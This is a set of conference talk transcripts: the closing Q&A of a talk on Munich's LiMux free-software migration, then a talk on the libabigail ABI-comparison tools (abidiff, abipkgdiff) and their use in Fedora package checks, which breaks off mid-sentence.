It doesn't make sense from a lot of aspects, because they also have the goal that in five years they would like to be independent of the operating system. So why focus now on migrating the operating systems when in five years they want to be independent of the operating system? That doesn't make a lot of sense. But in general, I haven't seen any evaluation there. It was not something for the city council of Munich to evaluate, but it could be an idea for the Free Software Foundation Europe — I guess you have some lawyers as well who may be able to check that. Okay, I'll note that down. But yeah, until now I'm not aware of one. And for the second point: yes, you're right, it's even better to focus on solutions than on applications — that might be a better word than applications. So thank you. Just to reiterate the comment from before: in 2018, next year, we will have a new data protection law throughout Europe which is even stricter, and enforcing that will become even harder with Windows 10 or whatever. So that's definitely one thing that the Free Software Foundation Europe and other free software initiatives should focus on when we are trying to gather selling points for open source. And yeah, that requires some legal advice. I'm pretty sure you do have some competent lawyers, but we need to stress that message more often, I think. Yeah, that might be a good thing. Such an analysis often costs a lot of money. So everybody who is interested in that — if you can support it, or if you know other organizations which would also be interested in joining this — then I'm very happy to do that. I think there will probably also be some issues there, because from everything you see from the city of Munich, it's already very much tailored towards going to Office 365 and a lot of things which will not run locally at the beginning. I also appreciate the call that you give to us to reflect on what role we will continue to play with these sorts of adoptions that come forth. You mentioned that this would likely be the end of Munich being considered a lighthouse. Are there other public service entities, particularly large-scale ones like the city of Munich, that we can now look to to be that lighthouse? Or are there others in the public sector investigating the use of open source at that kind of scale that we can now call the lighthouse? So first — I don't know if that got across — I'm somewhat reluctant about those big stars at all. Yes, sometimes organizations are doing good things, but sometimes those organizations then also change. For example, there was a very nice policy from the White House last year that when they develop new software, 20% of it should afterwards be published under a free software license — a very nice policy. That was a nice example at the time. Now it's getting more difficult to use that as a good example. Also, some organizations or countries have quite good policies — Russia introduced some free software policies, China is also using a lot of free software. The question is: do you want to have them as the shining examples of free software use? There are also other desktop users — the Gendarmerie in France, for example. And from the research by Investigate Europe we also learned that they are under permanent pressure from other organizations which try to get them to switch back again.
So in general, for a public administration which is switching to free software, it's very difficult to be in the public spotlight. It's also very difficult for a public administration running proprietary software to be in the spotlight. So I don't think we should put the many organizations which are moving to free software in a position where they don't have time to do the migration or to deal with their IT because they have to answer lots of public requests and deal with questions from all kinds of parties and so on. That's another issue which is problematic there. But I think we should focus more on lots of smaller examples where organizations did some nice things — like the example with FixMyStreet, where one government started with it and several others are now using it. And if you look, for example, at the Joinup website from the European Commission, there are regular examples of what public administrations are doing with free software. Some of them are better, some of them are maybe not so good from a free software perspective, but there are a lot of examples out there. And I would argue: pick some examples which you like — we don't even have to coordinate which examples we pick; pick the ones you like most, and then it's more distributed and we have way more examples of free software in use. Then it doesn't look like Linux is just used by Munich, and people learn about different examples from different people. So I don't want to tell you one or two examples which you will then all use. Search for your own. There are enough out there. Yeah. So, two comments. First of all, on the data protection laws: I wouldn't be too enthusiastic, because those guys at Microsoft aren't dumb. They have already established a fully German Office 365 with Deutsche Telekom. So if anyone just has a problem with data going to the US, they can claim: no, we have one that is managed by Deutsche Telekom, it's fully approved by the governments and so on. So yes, there will be some way of making this a topic, but they have already thought about many of those things, and other workloads are going into the cloud, so I'm sure that legislation will also take this into account to some extent. On the other hand, the cloud is in a way a good thing for us, because the desktop applications are no longer a real argument. I'm seeing more people do presentations live off Google Docs than use PowerPoint these days. So that's an argument where I think Munich is kind of late in the game. They are trying to switch back at a time when everyone else has realized: well, I may only need my iPad, my Android device, my Linux device with a browser, and I have access to all those things. Which basically is also my second big point: there is a very popular Linux-based desktop OS, Chrome OS, that is the market leader in the US educational market. Of course we wouldn't call it a free Linux OS — it has quite some strings attached — but it shows that if someone focuses on the whole ecosystem — how can I get my applications to run, how can I make user management easy, how can I lock down systems for students or employees — then those things can fly. I think it's just a matter of fragmentation between all the vendors, and it's very hard to do an open source implementation of a strictly enforced framework. Thank you. Thanks. I have a few notes. I'm involved in an open source initiative in the Czech Republic.
And what I can see is that it's always about the money, as you mentioned — whenever there is an argument for switching to open source, that's what gets said. But I think, as you mentioned at the end of your presentation, it should be more that anything which is funded by the government or by public money should be open source, or we should own the code, or it should be public domain. I think this is what can be highlighted, and it's one of the reasons why to do it — it doesn't matter if it's on Linux or anything else. The other note is: even if Munich fell as a lighthouse, we can take it as an opportunity to think about new starts and learn from it. Actually, this is what we are trying to do in the Czech Republic — we can learn not from mistakes, but from what didn't go well. And the last note is that whenever anything about open source in the public sector is discussed, we are mostly talking about the consequences, not the causes. For example, before a switch there should be some kind of discussion about what we want to switch, and whether we have enough input from the departments: what kind of information do they need to share, what do they need to work with? So for me, it's basically that governments or offices are switching to open source without evaluating the inputs for it, which can lead to a failure afterwards, because something doesn't work and nobody knew beforehand that it should have been done in a certain way. So I think that if this changes — if there is preparation, and before the migration starts there is clear data on what is needed and what the departments need — then it can help with the migration and even with public opinion. Okay. Thank you for the comment. I just realized one thing — maybe I was a bit too negative, because you mentioned that LiMux failed. I don't think that it was a failure, just to clarify that. Even with the costs and the savings and so on, there was at least one huge benefit — not so much for Munich, but for all the other public administrations around the world, or at least in Europe: by Munich showing that there is another way of doing it, all the other public administrations benefited, because in my opinion Microsoft had to calculate into their prices that there is another option. And from the research by Investigate Europe we also learned that public administrations got a huge cut in their Microsoft prices when they mentioned that they might switch to GNU/Linux. So even if all the rest of it had not been successful, it was not a failure — just to clarify that point. So yeah. Hi, Matthias. First, thanks for your great talk and also your great work — I appreciate it a lot. And I want to address the infamous desktop and usability issue. I talked to a few people who were more or less involved in the LiMux project, and some quite terrible stories reached me, of secretaries who basically couldn't work anymore — they were running out of the offices crying because they couldn't do their tasks. And one issue in Munich was that the city failed to educate their staff. When you have users and you make a big change — even if you just change the desktop from Windows to Linux, and even if you try to make it look visually the same — it's a different usability and you need to teach the people. This is something the city failed at entirely.
And this is an important point for the desktop, and for free software in general: it's about the users. I see that the community is sometimes very self-centered — "it works for me" doesn't mean it works for other people. A nice example I like to use is email clients. There is no email client that doesn't suck — all email clients suck. And there is no way that I can, for instance, get my mother to use Mutt, because it's not the way she wants to interact with a computer. So I see a lot of room for improvement regarding usability. And if we want more people to use the desktop, or also the applications, we need to develop them and make them work the way people want to interact with a computer. This is also why I guess Chrome OS is so successful, especially in the US: it just works the way people want the computer to work. And although, yes, there is Linux or some Gentoo underneath, it's not free software at all. But in the end, this is something I would recommend my mother to use, because it just sucks less than the others. That's basically my point. Okay. Yeah. Thank you. So I totally agree that there are a lot of ways we can improve the usability of free software. I think it's also partly connected with the question I raised about encouraging more people to pay for free software, because you can use that money to get other people involved who focus on usability instead of mainly implementing functions. I'm not so sure the LiMux project completely sucked at including the users. In comparison with other public administrations, my impression was that they included them even better than some other administrations did when they switched from one Microsoft version to the other — and things also all changed from one Office version to the other. So I'm not sure how much we should blame them there. But it is a huge effort to help users migrate from one software to another, and it's often underrated how many resources you need for that. And beside that, I'm very happy to discuss the usability of email clients afterwards, and I would argue that there are some good email clients which suck less — but that's for later, I think. Okay. Last question. Anyone? Okay. Thank you very much for a great talk. I want to address the question of why this happens. Can you move your mic a little bit up? Okay. Sorry. Yeah, for me, the problem is about education and socialization, because for most users — for instance, in my case, the first time I changed from Windows to Linux, the first things in my mind were: well, it's Linux, it's pretty difficult; how can I install my software, how can I set things up, how can I set up everything? But since the software I was working with only runs on Linux, well, I had to learn. And the more I learned, the more I thought: oh, well, it's not really that bad. And sometimes, for instance in LibreOffice Draw, I can even manipulate a picture for a publication instead of spending the time in CorelDRAW on Windows.
So yeah, I think maybe it's because most of the users are not from IT. They hear: okay, you should use Linux — and for them that means a black screen on the desktop. They grew up with Windows, so they will think twice before changing to something open source — something like that. Okay. Thank you. Thank you. Okay. So yeah, thank you very much for having me here again. Thank you for all your work for free software, and I'm looking forward to discussing with you in the future.
Started in 200X, the LiMux project was often cited as the lighthouse project for Free Software in the public administration. Since then we have regularly heard rumours about it. Have they now switched back to proprietary software again or not? Didn't they already migrate back last year? Is it a trend that public administrations aren't using Free Software anymore? Have we failed, and is it time to get depressed and stop what we are doing? Do we need new strategies? Those are questions people in our community are confronted with. We will shed some light on those questions, raise some more, and figure out what we -- as the Free Software community -- can learn from it.
10.5446/54472 (DOI)
So, hello everybody. Thank you for attending this talk — I know it's right after lunch, so thank you for being here. My name is Dodji. I work for Red Hat, in the tools team. My background is a little bit in compilers and debuggers, and for a while now I've been working on static analysis of ELF binaries to infer interesting things about ABIs and related matters. As a result, we came up with a framework named Abigail, which is an acronym for ABI Generic Analysis and Instrumentation Library. Well, it's also the name of the wife of the guy we started the project with. So, anyway. We use Abigail to compare binaries and come up with reports about the differences they have as far as the ABI is concerned. This can be really interesting to folks ranging from developers up to the people pushing the bits coming out of the developers' hands — namely these two kinds of people. And I thought it would be interesting to come and talk to you about what we've been doing in this area, and maybe we can find areas where we can work together and improve what we have, or change directions, and discuss. So in today's talk, I'm going to first try to define what we mean by ABI. This is a quite fluid concept — it's not well defined, so it means different things to everyone. So I thought it would be an interesting take to try to define what we actually mean by that in this project. Then we'll talk about what we mean by ABI compatibility, once we have a definition for the ABI. And then I'll jump straight to some examples of change reports we can get with the framework we have today. Once we have that, we'll dive into what Abigail is, what it does, how we perform those static analysis tasks, and see how it is used in real life today. And then we'll talk about possible improvements — I say "we'll talk" because I'll present something, but if you have ideas, please feel free to bring them up. So here we are. To define what an ABI is, let's set a context first. Suppose we have a binary, which we'll name E, and that binary uses code from another binary that we call L. E can be an executable — that's where the E comes from — or a shared library. If something is not clear, please just stop me right away rather than waiting for the end. So that's what E is. And L can be a shared library — it's a library, that's where the L comes from — or a dynamically loaded module. So this is the basic context. At execution time, what happens is that E expects properties from L. In this context, I wanted to say that we're talking mostly about ELF, the ELF binary format used on Linux — this is what we support right now. We could support other formats in the future, but right now we're talking about ELF. So E expects properties from L at execution time. Those properties can be things like the format of the binary and the architecture — an x86 ELF executable will expect an x86 ELF library, for instance. It will also expect the presence of certain ELF symbols, those coming from functions or global variables or other things. And a specific layout of data — by this I mean types: specific types of data with specific sizes, alignments, offsets, et cetera. There are also other things like calling conventions, et cetera, but the first three are the things we're going to focus on here.
So I wanted to stress also that those properties are structural. They are about the structure of the program, not its behavior. We're not talking about bugs where we were supposed to add two numbers and we are now dividing them — we're not talking about dynamic things. We're talking about structure: types, layout, things like that. So those properties, which are somewhat loosely defined, are what we call the ABI. The properties that E expects from L — those are the ABI of L. More specifically, when we talk about the ABI of a library, or of a binary in general, we'll be talking about the set of symbols that it defines and exports, and also the layout of the data expected by those symbols. From now on, I will stop talking about symbols; I'll talk about functions and variables, because that is what programmers care about, even though a function in source code usually ends up being a symbol in ELF. We want to talk about things that are meaningful to developers. So I'm going to talk about functions and variables now. One thing to keep in mind is that ABI changes are here to stay. They're inevitable in our free software world. We want our software to evolve — we've been talking about this during all these three days. We don't want to cast things in stone and say: oh no, you can't change anything anymore because you're going to break the ABI, whatever that means. Things are going to change and the ABI is going to evolve, because we are fixing bugs, we're adding features — we want the software to kick ass, basically. So we're going to add new functions, we're going to add new global variables, or we are going to change the signatures, the types and whatever else of the existing functions. All those things are going to happen, and we want them to keep happening. What we want, then, is to be able to detect the subset of those changes that are harmful. Can you read this? Yeah. So in this context, to us, only what we call ABI-incompatible changes are harmful. For instance, if you remove a function that was there in the library L and that was expected by the executable, that is a harmful ABI change. It's an ABI-incompatible change, because existing binaries out there will still expect the function that you removed from the newer version of the library. The same thing goes for incompatible data layout changes — basically a structure from which you removed a data member, things like that — or when you remove or add a function parameter. So you see, I'm not talking about symbols anymore at this point, even though we're looking at binaries. And it follows that ABI-compatible changes are fine. They're fine, but we might still need to see them and review them, to be sure that a change, even though it's not bad, is really the kind of change we expected — just from looking at the binary. One thing to keep in mind is that we want to be able to detect all of this by looking at the binaries only, not by looking at the source code. This is really important, and there are many reasons for it, but I think most of the distro people get it. Compilation is a kind of destructive process: there is some information that is not there anymore. But there is also some information in the binary that you can't see when you look at the source code.
For instance — and we'll see that later in some of the examples I have — when you look at a data structure, a class or a struct, you don't know what the offsets of the data members are just by looking at the source code. You have to think about it, right? But when you look at the binary, boom, you have that information. So looking at the binary is really interesting, because it reveals things that are hard to see when you just look at the source code. And we want to be able to detect those things as soon as possible. It's not when you are building the final stage of the distro that you want to detect them — as early as possible in the development process is what we want. And we need to keep in mind that there is no magic here. Most of the interesting changes need a human review to know whether they are harmful or not. So you need to make those changes stick out from the noise, and then have some folks review them, just like you review patches. For that, we want to use the diff paradigm we already have: let people review those ABI changes just as we review patches today — which is something we don't do yet, right? But that is the philosophy we're following while developing these tools and this framework. So yeah, I got ahead of the music here. Let's look at some examples. Okay, so this is where I switch to the demo. In this case, I just wanted to show you something very quick. I have a friend here, Frédéric, who told me once, probably 15 years ago, that showing code during a talk is a really bad thing to do, right? But here, I'm not showing the code of libabigail — I'm showing code that libabigail works on, so what I'm doing is different. So here you have a small function, f1, that has one parameter. And here you have a new version of f1, in which I added a parameter — and that's probably the only thing I did, I guess. So I wanted to show you what a libabigail-based tool sees. I've compiled these things — well, I can run the compiler again, just to show that I'm not... ah, yeah. This is an artist setup, it's like I'm on a piano or something. Okay. So I compiled this, and I'm just calling a tool named abidiff, and I give abidiff the first version of the binary, libexample1.so.0 — yeah, I wrote this this morning while having a chat with a fellow here, so I couldn't find a better name, I was more involved in our discussion — compared to libexample1.so.1. Oh, and I should redirect the output into a file named abi. So have you seen what I did? I called a program named abidiff. It's a program that is part of the libabigail tool set and that compares the ABI of two binaries. And here is the result, what it says. Can you read that? Yeah? Okay, it just says that the function f1 — with its signature — has some changes in one of its sub-types, and the change is that parameter 2 was added. That's all. And this is actually what we did; if I do a diff of the source code — sorry, v1 — you see here the source. Do you see that? Can you read that? So this is the diff, and this is the source code. And this is an example of the kind of report you get from looking at the binary.
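For readers of the transcript who cannot see the screen, the first demo boils down to something like the following sketch. The file and library names (test-v0.cc, test-v1.cc, libexample1.so.0/.so.1) and the function bodies are my guesses at what was shown, and I declare the functions extern "C" so that the symbol stays f1 in both versions, which matches the "parameter added" report the talk describes; none of this is the exact code from the slides.

    // test-v0.cc -- first version of the library
    extern "C" int f1(int a) { return a; }

    // test-v1.cc -- second version: a parameter is added to f1
    extern "C" int f1(int a, int b) { return a + b; }

    // Build each file into its own shared object with debug info, then
    // compare them (a sketch of what the talk runs at the prompt):
    //
    //   g++ -g -fPIC -shared -o libexample1.so.0 test-v0.cc
    //   g++ -g -fPIC -shared -o libexample1.so.1 test-v1.cc
    //   abidiff libexample1.so.0 libexample1.so.1 > abi
    //
    // As described in the talk, abidiff then reports that f1 has a
    // sub-type change: a second parameter was added.

The point of the demo is that this report comes purely from the ELF files and their DWARF debug info, not from the source.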
So you see that even though you're just looking at the binary and its debug information — because I've compiled this with debug information enabled — you can get quite detailed information, right? Like line numbers, et cetera. So we can move on to something more involved, with C++. Here, in blue, we have a class. You don't really need to read the details. We have a class here, C, and C is used by another type, a structure, underneath here. And you see, I still have a function named f1 that uses C, and a function named f2 that uses C as well. And on the second side of the screen, the thing that is highlighted in blue — well, I created a base class. I changed C and made C inherit a new class, like this. You know, I was listening to the fellow over there, so the inspiration came from you. So I just made this change. And then I thought, okay, how about also adding a virtual here, for instance, on the destructor of the class? The idea is just to make some changes and see what abidiff says. And I kept f1 as is — I didn't change the signature — and I kept f2 as is, too. Oh well, there is also an f3, but anyway, let's go. Did I try it? Oh, yes. So I compiled it as previously, and I'm running abidiff on the two binaries, putting the result into a text file, and then I'm opening the text file in Emacs. So the changes are interesting here. First, let's look at the summary of the changes. It says that there is one function that was changed — changed meaning that one of the types used by the function, or one of its sub-types, the types of those types, changed. And it also says that one function was added. Adding a function is not a problem; as I said earlier, it's an ABI change, but it's not necessarily a problem. But we still want to see it and review it and be sure that this change is really what we wanted. And it says that the function that was added was C::getM0. Did I add a function? I don't think so — I mean, I don't remember. So let's look. This was the first version of the class. You see, getM0 was already there in the first version. And in the second one, what did I do? In the second one, I still have getM0. But you see I made a little change here in f1: in f1, I invoked getM0 — you see, here, in blue — whereas in the first version, there was no such call. Okay. So this is C++. getM0 here is inline — you know what inline means? So by default it is not emitted as a symbol. But in the second case, it is emitted: GCC generates it because it is called, because someone uses it. This is also because I compiled without optimization. If I compile with optimization — we can try that later, because time is flowing — you'll see that this added function will disappear, because the function is just inlined and not generated as a symbol. These are the interesting things that you see when you just look at the binaries rather than at the source code. The same source code can produce different binaries depending on how you compiled it, how you changed the code, et cetera. This is what I meant when I was saying we want to look at the binaries only.
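The C++ change being described is roughly the following. Beyond the names the talk gives (C, getM0, f1, f2), the names base and m0 and the bodies are my reconstruction, not the exact code on the slide; the two snippets stand for two successive versions of the same source file.

    // example-v0.cc (sketch): first version of the library
    class C {
      int m0;
    public:
      ~C() {}                           // non-virtual destructor: no vtable
      int getM0() const { return m0; }  // inline: no symbol emitted unless used
    };
    void f1(C *c);
    void f2(C *c);

    // example-v1.cc (sketch): base class inserted, destructor made virtual
    class base {
    public:
      int b0;
    };
    class C : public base {             // base class insertion reported by abidiff
      int m0;
    public:
      virtual ~C() {}                   // 'virtual' added: a vtable pointer is
                                        // inserted at the start of C, so its size
                                        // and all member offsets change
      int getM0() const { return m0; }
    };
    int f1(C *c);                       // return type changed from void to int;
                                        // the new body also calls c->getM0(), so
                                        // at -O0 g++ emits getM0 as a symbol and
                                        // abidiff sees it as an "added function"
    void f2(C *c);

This is only an illustration of the kind of edit being discussed; the report walkthrough that follows explains what abidiff makes of it.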
Well, being able to look at those things. So, the added function: here you see the symbol of the function, and here you see its signature. And now let's look at the changes, at what it says. First, it says that the return type of f1 changed. Of course, that's true — I changed it from void to int — so we catch that. You see, there are some tools around that just look at the symbols, and because in C++ the symbols are mangled, people think you could derive the types used by the function from the mangling. Do you follow me? People say that, people think that. Well, they're wrong. Because, for instance, the return types of functions are not part of the mangling — only the parameters are part of the mangling. And here I made that change on purpose: you see that the return type of the function changed, and we want to catch that too. So we really need to go look at the debug info and analyze all of that. The next change it shows us is that the first parameter, which is a pointer to C — a pointer to the class C — changed. How did it change? It changed because the thing that is pointed to by that pointer, which is C, changed. And how did C change? It had one base class insertion — you remember I said that I added a new base class, I made C inherit a new class. We can catch that too, by looking at the parameter. This is what we do. And as a result of all those changes, the size of C changes too. This is something you cannot see by just looking at the source code — well, you can see that it might change, but you're not sure. Actually, the reason why the size changed here is the virtual. You remember I added a virtual keyword to the destructor. Because of that virtual, a vtable got added to the class, and the vtable pointer is added at the beginning. The vtable is the reason why the size changed here. So we see here that there is a vtable insertion, and we can say at which line it was inserted, the vtable offset, et cetera. And as a result, because something got inserted at the beginning of the class, the offsets of all the data members of the class changed too, and we report those changes as well. All of that just by adding a virtual, right? So yeah, we can learn a lot by just looking at the binaries. So now I guess I'm done showing off what we can do with this kind of tooling. What do we do behind the scenes? Basically, Abigail — well, libabigail, because that's the name of the project: libabigail is the library that implements all the stuff, and there is also a set of tools that come on top of that library. So basically, we represent ABI artifacts. What does that mean? We have an in-memory model for types and declarations, just like a compiler does, just like LLVM does. Abigail represents scalar types — integers, characters, and so on — aggregate types, that is arrays, structures, classes, unions and so forth, and declarations, a declaration being something that has a name and a type. All those things are represented. You can write code saying: okay, this is a function, the function has parameters, and I'm adding a new parameter. You can manipulate those things. On top of that, Abigail has a model of what I call bundles of ABI artifacts. The first bundle is obviously the translation unit.
So whenever you look at a binary, the binary has debug information, when it has it, and that debug information describes things translation unit per translation unit. And it is inside those translation units that you have declarations and their types. So we represent those translation units in the Abigail model, and we represent what we call an ABI corpus, and an ABI corpus is the representation of a set of translation units. So basically a shared library, the ABI artifacts of a shared library, is represented in Abigail-speak as an ABI corpus. That's what we call it. And once we have ABI corpora, yeah, because the plural of corpus, the Latin word, is corpora, I was told anyway, so when you have those corpora, you can, well, compare them. And so, as usual, we build a model of the diff. If you make a parallel with the GNU diff tool: when the GNU diff tool computes the difference of two files, what does it do with the difference? It just emits it. If you look at the source code, that's what it does. It sees the difference, boom, it emits it as text. It doesn't do anything with that difference. In our case, we build a model of the difference, and we actually build a graph of those differences. So if there is a difference between two structures, for instance, that difference might come from the fact that one of the data members of those two structures changed. So you will have one tree node representing the difference between the two structures, and a child tree node representing the detail of that change, the detail being the change of the data member. Do you understand what I mean? And like that, you have a full graph of the changes in memory. Once we have that, we can categorize the changes. I mean, we can walk the changes and mark them, saying, okay, this change is that kind of change. Because, I don't know, for instance, in C++, you can have a change about, I don't know, a private data member becoming public. This is a change. But it might not be the same kind of change as removing a data member. So we will put the first change in a category named, say, private change category, and the second change will be put in another category. So, categorizing changes. One of the good things about categorizing changes is that we can spot changes that come up over and over. In the previous example I showed you, you've seen that there were two functions using the class C, right, functions f1 and f2. If you don't remember, I'm telling you again. But in the report, you saw the change about f1 only, saying f1 changed, blah, blah, blah, because of C. And you didn't see the change about f2. Well, f2 changed too, because of C. You didn't see it because the tool categorized the changes on f2 as being redundant. And why? Because it's the same C that changed that we've seen before. If we have time, we can go back and I'll show you, abidiff has an option to show you the redundant changes too, if you want to see everything. And we can do this kind of analysis because we keep a model of the changes in memory. We don't just emit those changes as soon as we see them. One thing that is interesting too, that I wanted to show, but time is moving, so we can come back to that later if we finish early, is what we call suppression specifications. You guys know about Valgrind, right? Yeah. In Valgrind you have suppressions. You know that. To me, it's the best thing ever in Valgrind, right? You have an error that keeps popping up.
You know about it, but you don't want to see that error again because for you it's noise, right? Suppression specifications. We have the same thing in Libabigail, actually. And it's a bit more complicated, well, let's say more evolved, than in Valgrind, because you can say things like: don't show me changes about a type whose name is Foo. But you can also say: okay, don't show me changes about that type if the change is an addition, a new member added at the end of C. Or you can say things like: don't show me changes about function F if F is part of a file named blah, blah, blah. You know, there are many, many different things you can express, and of course those things come from users. They come saying, I have this case where, you know, I would like to... okay, can you do something? You know, and we discuss it and, you know, we end up with something, a new category. So we do these kinds of things. So afterwards we report about the changes, and reporting means, again, walking the graph of diffs and, depending on the category of a diff node, reporting about it or not. If the category says, oh, this node has been suppressed by the user, then you won't report it. Right? Or if the category says, oh, this is a typedef name change. Sometimes you have changes like that. Somewhere you have a type that is an integer and someone renamed it, well, someone defines a typedef saying, you know, that integer's name is now fancy_type, for instance. So this is not a real... you know, it's a change, but it's not necessarily harmful. Right? Some folks want to be able to dismiss, well, suppress, those things. So we have a category for those kinds of changes too. So the reporting engine knows about the categorization and decides to show things depending on that. And of course, for now we only have one kind of text report. But we could have more; well, that's what we have. So we've just seen what we can build as an in-memory model. Right? So where do we build that model from? We build it from reading ELF and DWARF. DWARF is the format for debug info in ELF, basically. Those guys like Tolkien's books, and, well, I guess... but anyway. So in Libabigail, there is a reader component that knows how to read ELF, and it's written in C++. And from that, it builds the Abigail model I was talking to you about earlier, in memory. So it does that for shared libraries, object files, and actually also executables, even if I don't mention that here. Once we have that, once we can read from ELF and build a model, well, we can also write it down to files, obviously, so that people can define snapshots of the ABI of a binary or a package. You have a binary, you don't want to put that into Git. Well, you can extract its ABI and stash that ABI into Git. The format is an ad hoc XML format we came up with, and we call that ABI XML. And of course, we can read it back. So this is interesting because once you read it back, you build an Abigail model, and so it lets you, well, I'll talk about that later, compare a binary against an ABI XML file, because you can read both. We come up with the in-memory model and then we can work on the in-memory model. Which brings me to the tooling around Abigail. So I'll just skim quickly through some of the tools we have today.
So first we have abidw, which emits, you know, serializes, the ABI representation of a binary to a text file; that's a tool. We have abidiff, which you have seen. So abidiff can compare two binaries, two ABI XML files, or one ABI XML file and one binary, you know, things like that. So you can compare a binary against a baseline. There is abipkgdiff, which compares the ABI of binaries that are inside RPMs or deb files. So that was, yeah, written for someone else and now I maintain it. And the last one that came to the family is fedabipkgdiff. These guys keep coming up with longer names. We need to do something about this. I didn't write this one. It's someone else, a colleague who wrote it on his own time, by the way. So this one is interesting. Okay, abipkgdiff, just so that you have things in mind, works on RPMs. But when you work on RPMs, the debug info is split; it's in a separate package. So you've seen that with abidiff, when we want to compare two binaries, we just need the two binaries. If you want to compare two packages, you actually need four. Yeah, because you need the two debug info packages. So the command line starts getting a bit longer. You can actually need even more in certain cases, because Libabigail sees everything, basically. I mean, there are some changes, I should show you some examples, but there are some changes to some types that some developers don't want to see. Because they say that, oh, this type is private, whatever that means. In ELF, there is no such concept as a private type. But what the developer means by that is that the type was not defined in the public headers shipped by the package, or whatever. That's what they mean by private. But in the binary, we see all the types. We don't care about that, so we tell you about all the changes. So people came to me saying, oh, I don't want to see the changes about those types. So there is an option to abipkgdiff where you give it the devel packages in which there are the header files, and then it won't show you changes about types that are not defined in the header files. So, six packages. You need six packages just to run abipkgdiff. That's a bit too much when you type command lines. So fedabipkgdiff is quite handy because, you type it, the name is long, but then afterwards it becomes shorter. You say fedabipkgdiff --from, say, Fedora 10, I don't know, --to Fedora 20, and the httpd package. So it will go fetch all the packages, the httpd packages from Fedora 10 and 20, you know, the debuginfo packages, the devel packages, whatever, compare them and show you the difference. So that's what it does. So maybe we would need something like this for OBS, or... wow, just saying. Anyway, this is the part of the talk I'm going to change if I go talk to the Debian guys. But anyway, I'm talking out loud here. It's a good thing it's not recorded, right? So, doing this, we faced, and we're still facing, some interesting challenges. Well, speed and space matter a lot, a lot more than what people think. When you're dealing with something like Libabigail, you are looking at the entire binary. And usually your compilation tool chain, even your compilation tool chain, doesn't do that, unless you do something called LTO, but we'll put that aside. Usually your compiler just compiles things file by file, translation unit by translation unit, right? And the linker that sees everything doesn't analyze types, right?
So it doesn't see types either. We see all the types of all the translation units of the shared library, so that can be a lot, a lot, especially when you have, like, big C++ binaries. And this is also due to the fact that the same types get included over and over and over again. Did I forget an 'over'? Okay, over again. This is thanks to the famous #include thing that I love, right? So think about it. We build representations, in-memory representations, for those types, for all of them. If we have hundreds of thousands of types in memory, that can be a lot. You can end up with gigabytes and gigabytes of memory used just to represent those types. And you need two copies, because of course you're comparing two libraries, right? So we need to do something about that. We need to de-duplicate those types. So basically what it means, and compiler people have fancy names for easy concepts, is: when you see a type foo the first time, okay, type foo, and then you go to the next translation unit and you see type foo again, well, you shouldn't rebuild an in-memory representation for this foo. You should reuse the first one you saw. De-duplication. But to do that, so it's an easy concept, but then to do that, you need to be fast, because how do you know that the second foo is the same one as the first one? It is not because it is named foo that it is necessarily the same as the first one. In C++, normally it should be the same, because there is something named the one definition rule, which is a C++ rule saying that if two entities have the same name, then they ought to be the same entity. But in C, you don't have such a thing. Yeah, C, anyway. So in C you can have a foo in one file, and a different foo in another file. The two foos are exported, well, used by exported functions, and they're not the same. So, well, we want to de-duplicate things, so we need to know if the second foo is the same as the first one. So we need to compare them. And comparison, by construction, is an exponential problem. You compare things member-wise, and those members have types themselves that are structures that have members that are structures that blah, blah, blah, and then you end up... you know, it's exponential. And seriously, I mean, if you do these things naively, it can take hours to complete, just to compare two packages. So we need to use some heuristics to transform the problem into a more linear one so that things can complete quickly. So there are some interesting, you know, graph algorithms underneath. We also need to control, well, to avoid seeing things we don't want to see. And when I say 'we', the 'we' depends on the project. A change, an ABI change, for your project might be harmless, and that very same change might be harmful for his project. He might want to see those. So we need to give you ways to, you know, avoid seeing what you don't want to see. So this is why we came up with suppression specifications, but it goes further. For instance, if you have a file whose name ends with .abignore in your package, in your RPM file, abipkgdiff will detect that and use it as a suppression specification. Right. And think about it: if you build, for instance, an ABI verifier at the distro level, you will need to provide users with this kind of capability, provide them with the ability to say, okay, this change is okay, I don't want to see it again in my next runs.
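Coming back to the de-duplication point above: a rough sketch of the idea, in hypothetical code that is not libabigail's implementation, is to keep one canonical in-memory object per type and look it up through a cheap key such as the type's name and kind, so that the expensive structural comparison is only ever done on key collisions.

```cpp
#include <memory>
#include <string>
#include <unordered_map>

// Hypothetical sketch of type de-duplication (canonicalization); not
// libabigail's real code.
struct Type {
  std::string name;   // a real model also carries members, size, location, ...
};

class Canonicalizer {
  // The key is something cheap to compute, e.g. "struct|foo". This toy
  // version trusts the key; a real tool still has to compare candidates
  // structurally on a key hit, because C allows two different types with
  // the same name, and taming that comparison is the expensive part.
  std::unordered_map<std::string, std::shared_ptr<Type>> canonical_;

public:
  std::shared_ptr<Type> intern(const std::string& key,
                               const std::shared_ptr<Type>& candidate) {
    auto it = canonical_.find(key);
    if (it != canonical_.end())
      return it->second;             // seen before: reuse the first representation
    canonical_.emplace(key, candidate);
    return candidate;                // first occurrence: this becomes the canonical one
  }
};
```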
And of course, this is a library that we're talking about, not only tools, so it needs more documentation. So basically, all the entry points need to be documented, and we're doing that already, but we need more documentation about the internals and things like that. And we're doing it; I mean, the things that are in this challenges section are things we're doing already, but I wanted to stress them so that you guys are aware of them. We need a huge set of binaries for regression testing. ELF and DWARF are very loose formats. You can put anything in ELF or in DWARF. So unless you test stuff, you don't know what you are expecting or what you're really doing. So we need a lot of tests. So the Libabigail tarball is more than 100 megabytes in size. The reason is that we have lots of binaries just for testing when you run make check. So yeah, and we need even more than that. And now what we're planning to do is to actually use fedabipkgdiff, or something else, to go and use the packages in the distros and the distro histories as regression testing. For instance, if you compare a package against itself, it should yield the empty set. Just doing that on thousands of packages will be good. So this is really important, just like we test compilers. So in Fedora, we're using this thing to compare the ABI of new packages that are pushed. It's been in production for a couple of months. So yeah, basically, we perform an ABI diff of the new package against the previous stable one, and it sends a friendly message to the package maintainer. So the changes are categorized, and now you know what a category is, basically, but roughly, in this case, it's less detailed than what we can do. But this is what they wanted. Well, there are certain kinds of changes for which we are sure that they're going to cause a problem, incompatible ABI changes, for instance removed symbols; those are flagged as failed for the build, basically. And the most interesting changes, for instance the changes I showed you about the subtypes of functions, those are flagged as needing inspection. So the package maintainer needs to inspect the package in those cases, and otherwise the package is flagged as passed as far as this ABI test is concerned. So it is based on Taskotron. I think you guys know about that. The task that runs on each package is named abicheck. You can Google that. And it uses abipkgdiff to perform those things. It's written in Python. So that's it. At the same time, package maintainers can use fedabipkgdiff, so they don't have to wait until they submit their package to see ABI changes. And so it is in production. The limitations, you know them: it only works on C and C++ shared libraries today. But, well, tomorrow, if folks doing Rust want support, I mean, if it is ELF, we can support it. We can do some work. And it just runs on a 